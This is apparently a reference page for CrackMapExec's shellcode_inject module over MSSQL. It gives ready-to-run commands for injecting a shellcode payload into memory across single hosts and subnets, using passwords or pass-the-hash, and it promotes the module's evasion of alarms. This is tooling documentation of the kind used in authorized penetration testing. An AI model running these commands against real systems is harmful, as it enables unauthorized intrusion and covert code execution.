CrackMapExec Shellcode_inject (mssql)


This page contains detailed information about how to use the shellcode_inject CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description


This module downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script.

The shellcode_inject module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols


  • mssql
  • smb

Module Source Code


Authors


Module Options


Here is a complete list of shellcode_inject module options:

# cme mssql -M shellcode_inject --options
[*] shellcode_inject module options:

            PATH     Path to the file containing raw shellcode to inject
            PROCID   Process ID to inject into (default: current powershell process)

The PATH option is required! Make sure to set it when using this module.

Module Usage


This is how to use the shellcode_inject module while using the mssql protocol:

Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M shellcode_inject -o PATH=<path>

Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M shellcode_inject -o PATH=/path/to/payload.bin
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M shellcode_inject -o PATH=/path/to/payload.bin

Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M shellcode_inject -o PATH=/path/to/payload.bin

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M shellcode_inject -o PATH=/path/to/payload.bin
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M shellcode_inject -o PATH=/path/to/payload.bin
The shellcode_inject module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme mssql target_list.txt -u sa -p P@ss123 -d . -M shellcode_inject -o PATH=/path/to/payload.bin
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M shellcode_inject -o PATH=/path/to/payload.bin
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M shellcode_inject -o PATH=/path/to/payload.bin

References


Version


This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.